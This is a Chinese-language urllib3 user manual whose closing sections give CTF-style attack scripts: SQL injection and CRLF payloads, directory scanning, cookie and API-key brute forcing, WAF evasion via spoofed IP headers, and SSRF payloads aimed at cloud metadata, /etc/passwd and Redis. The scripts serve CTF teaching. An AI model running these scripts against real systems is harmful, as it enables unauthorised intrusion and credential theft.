urllib3 使用手册(Python HTTP客户端库)¶
urllib3 是一个功能强大的 Python HTTP 客户端库,提供了连接池、SSL/TLS验证、自动重试等高级功能。
目录¶
概述¶
urllib3 是一个用户友好的 HTTP 客户端库,比标准库的 urllib 更强大: - 连接池管理:自动管理和重用连接 - 客户端 SSL/TLS 验证:支持证书验证 - 自动重试:可配置的请求重试机制 - 多部分编码:支持文件上传 - Helper 方法:简化常见 HTTP 操作
适用场景: - Web 爬虫开发 - API 接口调用 - CTF Web 题目(SQL注入、XSS、SSRF) - 网络请求测试
版本信息:本手册基于 urllib3 v2.0+
安装方法¶
基本安装¶
# 使用 pip 安装
pip install urllib3
# 安装指定版本
pip install urllib3==2.0.0
# 升级到最新版
pip install --upgrade urllib3
验证安装¶
额外依赖¶
# 安装 SOCKS 代理支持
pip install urllib3[socks]
# 安装 Brotli 压缩支持
pip install urllib3[brotli]
# 安装所有可选依赖
pip install urllib3[socks,brotli]
基本用法¶
简单 GET 请求¶
import urllib3
# 创建 PoolManager
http = urllib3.PoolManager()
# 发送 GET 请求
response = http.request('GET', 'http://httpbin.org/get')
# 打印响应
print(response.status) # 200
print(response.data.decode()) # 响应内容
print(response.headers) # 响应头
简单 POST 请求¶
import urllib3
import json
http = urllib3.PoolManager()
# POST 表单数据
data = {'key': 'value', 'username': 'admin'}
response = http.request(
'POST',
'http://httpbin.org/post',
fields=data
)
# POST JSON 数据
headers = {'Content-Type': 'application/json'}
json_data = json.dumps({'key': 'value'})
response = http.request(
'POST',
'http://httpbin.org/post',
body=json_data,
headers=headers
)
设置请求头¶
import urllib3
http = urllib3.PoolManager()
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
'Accept': 'text/html,application/json',
'Authorization': 'Bearer YOUR_TOKEN'
}
response = http.request(
'GET',
'http://httpbin.org/headers',
headers=headers
)
核心功能¶
1. 连接池管理¶
PoolManager:
import urllib3
# 创建连接池(默认10个连接)
http = urllib3.PoolManager(
num_pools=10, # 连接池数量
maxsize=10, # 每个池的最大连接数
block=False, # 池满时是否阻塞
timeout=5.0 # 超时时间
)
# 发送请求(自动管理连接)
response = http.request('GET', 'http://example.com')
ProxyManager(代理):
import urllib3
# HTTP 代理
proxy = urllib3.ProxyManager('http://proxy.example.com:8080')
response = proxy.request('GET', 'http://example.com')
# 带认证的代理
proxy_url = 'http://user:pass@proxy.example.com:8080'
proxy = urllib3.ProxyManager(proxy_url)
# SOCKS 代理
from urllib3.contrib.socks import SOCKSProxyManager
proxy = SOCKSProxyManager('socks5://localhost:1080')
response = proxy.request('GET', 'http://example.com')
2. 超时控制¶
import urllib3
http = urllib3.PoolManager()
# 设置总超时
response = http.request('GET', 'http://httpbin.org/delay/3', timeout=5.0)
# 分别设置连接和读取超时
from urllib3.util.timeout import Timeout
timeout = Timeout(connect=2.0, read=5.0)
response = http.request('GET', 'http://httpbin.org/delay/3', timeout=timeout)
# 禁用超时
response = http.request('GET', 'http://example.com', timeout=None)
3. 重试机制¶
import urllib3
from urllib3.util.retry import Retry
# 配置重试策略
retry = Retry(
total=3, # 最大重试次数
read=3, # 读取错误重试
connect=3, # 连接错误重试
backoff_factor=0.3, # 重试间隔因子
status_forcelist=[500, 502, 503, 504], # 触发重试的状态码
allowed_methods=['GET', 'POST'] # 允许重试的方法
)
http = urllib3.PoolManager(retries=retry)
response = http.request('GET', 'http://httpbin.org/status/500')
4. SSL/TLS 配置¶
import urllib3
import certifi
# 使用系统证书
http = urllib3.PoolManager(
cert_reqs='CERT_REQUIRED',
ca_certs=certifi.where()
)
# 禁用 SSL 验证(不推荐,仅测试用)
urllib3.disable_warnings()
http = urllib3.PoolManager(cert_reqs='CERT_NONE')
# 使用自定义证书
http = urllib3.PoolManager(
cert_file='/path/to/client.crt',
key_file='/path/to/client.key',
ca_certs='/path/to/ca-bundle.crt'
)
5. 文件上传¶
import urllib3
http = urllib3.PoolManager()
# 上传单个文件
with open('file.txt', 'rb') as f:
response = http.request(
'POST',
'http://httpbin.org/post',
fields={
'file': ('filename.txt', f.read(), 'text/plain')
}
)
# 上传多个文件
with open('file1.txt', 'rb') as f1, open('file2.txt', 'rb') as f2:
response = http.request(
'POST',
'http://httpbin.org/post',
fields={
'file1': ('file1.txt', f1.read(), 'text/plain'),
'file2': ('file2.txt', f2.read(), 'text/plain'),
'field': 'value'
}
)
6. Cookie 管理¶
import urllib3
http = urllib3.PoolManager()
# 发送 Cookie
headers = {'Cookie': 'session=abc123; user=admin'}
response = http.request('GET', 'http://example.com', headers=headers)
# 获取响应中的 Cookie
set_cookie = response.headers.get('Set-Cookie')
print(set_cookie)
高级特性¶
1. 流式下载¶
import urllib3
http = urllib3.PoolManager()
# 流式读取大文件
response = http.request(
'GET',
'http://example.com/large_file.zip',
preload_content=False # 不预加载内容
)
# 分块读取
with open('downloaded_file.zip', 'wb') as f:
for chunk in response.stream(1024 * 1024): # 1MB chunks
f.write(chunk)
# 释放连接
response.release_conn()
2. 自定义请求头¶
import urllib3
http = urllib3.PoolManager()
# 常见请求头
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Referer': 'http://example.com',
'X-Requested-With': 'XMLHttpRequest' # AJAX 请求
}
response = http.request('GET', 'http://example.com', headers=headers)
3. 响应处理¶
import urllib3
import json
http = urllib3.PoolManager()
response = http.request('GET', 'http://httpbin.org/json')
# 状态码
print(response.status) # 200
# 响应头
print(response.headers)
print(response.headers['Content-Type'])
# 响应内容
print(response.data) # bytes
print(response.data.decode()) # str
# JSON 解析
json_data = json.loads(response.data.decode())
# 检查重定向
if response.get_redirect_location():
print(f"Redirected to: {response.get_redirect_location()}")
4. 自定义重定向¶
import urllib3
http = urllib3.PoolManager()
# 禁用自动重定向
response = http.request(
'GET',
'http://httpbin.org/redirect/3',
redirect=False
)
print(response.status) # 302
# 手动处理重定向
location = response.get_redirect_location()
if location:
response = http.request('GET', location)
CTF常见场景¶
场景1:SQL注入自动化¶
import urllib3
import urllib.parse
http = urllib3.PoolManager()
# SQL 注入 Payload
payloads = [
"' OR '1'='1",
"' OR 1=1--",
"admin'--",
"' UNION SELECT NULL--",
]
url = 'http://target.com/login'
for payload in payloads:
data = {
'username': payload,
'password': 'password'
}
response = http.request('POST', url, fields=data)
if 'Welcome' in response.data.decode():
print(f"[+] Success with payload: {payload}")
break
else:
print(f"[-] Failed: {payload}")
场景2:目录扫描¶
import urllib3
import time
http = urllib3.PoolManager()
# 常见目录列表
directories = [
'admin', 'backup', 'config', 'database', 'uploads',
'test', 'dev', 'api', 'private', '.git'
]
base_url = 'http://target.com'
for directory in directories:
url = f"{base_url}/{directory}/"
try:
response = http.request('GET', url, timeout=3.0, redirect=False)
if response.status == 200:
print(f"[+] Found: {url} (Status: {response.status})")
elif response.status == 403:
print(f"[!] Forbidden: {url}")
elif response.status in [301, 302]:
print(f"[>] Redirect: {url} -> {response.get_redirect_location()}")
except Exception as e:
print(f"[-] Error: {url} - {e}")
time.sleep(0.1) # 避免请求过快
场景3:HTTP 头部注入¶
import urllib3
http = urllib3.PoolManager()
# CRLF 注入测试
payloads = [
"test\r\nX-Injected: true",
"test\nSet-Cookie: admin=true",
"test%0d%0aX-Injected: true"
]
for payload in payloads:
headers = {'X-Custom-Header': payload}
try:
response = http.request(
'GET',
'http://target.com/reflect',
headers=headers
)
if 'X-Injected' in response.headers:
print(f"[+] CRLF Injection successful!")
break
except Exception as e:
print(f"[-] Failed: {e}")
场景4:Cookie 爆破¶
import urllib3
import itertools
import string
http = urllib3.PoolManager()
# 爆破 session cookie(假设是4位数字)
url = 'http://target.com/admin'
for session_id in range(1000, 2000):
headers = {'Cookie': f'PHPSESSID={session_id}'}
response = http.request('GET', url, headers=headers)
if response.status == 200 and 'Admin Panel' in response.data.decode():
print(f"[+] Valid session: {session_id}")
break
if session_id % 100 == 0:
print(f"[*] Tried: {session_id}")
实战案例¶
案例1:绕过 WAF¶
import urllib3
import random
import time
http = urllib3.PoolManager()
# User-Agent 轮换
user_agents = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
]
def bypass_waf_request(url, payload):
headers = {
'User-Agent': random.choice(user_agents),
'X-Forwarded-For': f"10.0.0.{random.randint(1, 255)}",
'X-Real-IP': f"192.168.1.{random.randint(1, 255)}",
}
# 延迟请求
time.sleep(random.uniform(0.5, 2.0))
response = http.request('GET', url, headers=headers)
return response
# 使用示例
response = bypass_waf_request('http://target.com/api?id=1', "' OR 1=1--")
案例2:API 密钥爆破¶
import urllib3
import string
import itertools
http = urllib3.PoolManager()
def generate_api_keys(length=4):
"""生成所有可能的 API key(示例:仅数字)"""
chars = string.digits
for combination in itertools.product(chars, repeat=length):
yield ''.join(combination)
def test_api_key(api_key):
url = f"http://api.example.com/data?key={api_key}"
try:
response = http.request('GET', url, timeout=5.0)
if response.status == 200:
return True, response.data.decode()
elif response.status == 401:
return False, "Invalid key"
else:
return False, f"Status: {response.status}"
except Exception as e:
return False, str(e)
# 爆破 API key
for i, api_key in enumerate(generate_api_keys(4)):
is_valid, message = test_api_key(api_key)
if is_valid:
print(f"[+] Valid API Key found: {api_key}")
print(f"[+] Response: {message}")
break
if i % 100 == 0:
print(f"[*] Tested: {i} keys")
案例3:SSRF 利用¶
import urllib3
http = urllib3.PoolManager()
# SSRF Payload
ssrf_payloads = [
'http://127.0.0.1/admin',
'http://localhost:8080/status',
'http://169.254.169.254/latest/meta-data/', # AWS metadata
'file:///etc/passwd',
'gopher://127.0.0.1:6379/_INFO' # Redis
]
url = 'http://target.com/fetch'
for payload in ssrf_payloads:
data = {'url': payload}
try:
response = http.request('POST', url, fields=data, timeout=10.0)
content = response.data.decode()
if response.status == 200 and len(content) > 10:
print(f"[+] SSRF Success!")
print(f"[+] Payload: {payload}")
print(f"[+] Response: {content[:200]}")
break
except Exception as e:
print(f"[-] Failed: {payload} - {e}")
常见问题¶
问题1:SSL 证书验证错误¶
错误信息:SSLError: certificate verify failed
解决方案:
import urllib3
# 方法1:安装 certifi
import certifi
http = urllib3.PoolManager(ca_certs=certifi.where())
# 方法2:禁用验证(仅测试)
urllib3.disable_warnings()
http = urllib3.PoolManager(cert_reqs='CERT_NONE')
问题2:连接池耗尽¶
错误信息:ConnectionPool is full
解决方案:
# 增加连接池大小
http = urllib3.PoolManager(maxsize=50)
# 或手动释放连接
response = http.request('GET', url, preload_content=False)
response.release_conn()
问题3:超时错误¶
解决方案:
from urllib3.util.timeout import Timeout
# 设置更长的超时
timeout = Timeout(connect=10.0, read=30.0)
http = urllib3.PoolManager(timeout=timeout)
参考资源¶
官方文档¶
- urllib3 官网:https://urllib3.readthedocs.io/
- GitHub:https://github.com/urllib3/urllib3
- PyPI:https://pypi.org/project/urllib3/
教程和示例¶
- urllib3 User Guide:https://urllib3.readthedocs.io/en/stable/user-guide.html
- Advanced Usage:https://urllib3.readthedocs.io/en/stable/advanced-usage.html
相关库¶
- requests:https://requests.readthedocs.io/(基于 urllib3)
- httpx:https://www.python-httpx.org/(异步支持)
- aiohttp:https://docs.aiohttp.org/(异步 HTTP)
快速参考¶
基本请求¶
import urllib3
http = urllib3.PoolManager()
# GET
response = http.request('GET', 'http://example.com')
# POST
response = http.request('POST', 'http://example.com', fields={'key': 'value'})
# 带 headers
headers = {'User-Agent': 'Custom'}
response = http.request('GET', 'http://example.com', headers=headers)
常用配置¶
# 超时
http.request('GET', url, timeout=5.0)
# 重试
from urllib3.util.retry import Retry
retry = Retry(total=3, backoff_factor=0.3)
http = urllib3.PoolManager(retries=retry)
# 代理
proxy = urllib3.ProxyManager('http://proxy:8080')
# 禁用 SSL 验证
urllib3.disable_warnings()
http = urllib3.PoolManager(cert_reqs='CERT_NONE')
文档版本:v1.0 更新日期:2025-01 适用版本:urllib3 v2.0+